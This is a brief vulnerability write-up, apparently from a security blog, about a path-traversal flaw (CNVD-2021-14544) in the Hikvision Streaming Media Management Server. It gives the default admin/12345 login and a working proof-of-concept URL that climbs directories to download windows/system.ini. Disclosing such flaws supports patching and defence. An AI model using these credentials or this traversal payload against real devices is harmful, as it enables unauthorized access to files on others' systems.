Hikvision Streaming Media Management Server A Random File Reading Vulnerability In The Background Cnvd 2021 14544
Hikvision Streaming Media Management Server A Random File Reading Vulnerability In The Background Cnvd 2021 14544
HIKVISION Streaming Media Management Server A random file reading vulnerability in the background CNVD-2021-14544
Vulnerability Description
There is a weak password vulnerability in the streaming media management server of Hangzhou Hikvision System Technology Co., Ltd., which can use the vulnerability to log in to the background to obtain sensitive information through file traversal vulnerability.
Vulnerability Impact
HIKVISION Streaming Media Management Server
Network surveying and mapping
Vulnerability reappears
The login page is as follows, the default account password is admin/12345
The POC is as follows, visit the following Url to download the system.ini file
https://xxx.xxx.xxx.xxx/systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../windows/system.ini
Successfully read C:/windows/system.ini
This post is licensed under CC BY 4.0 by the author.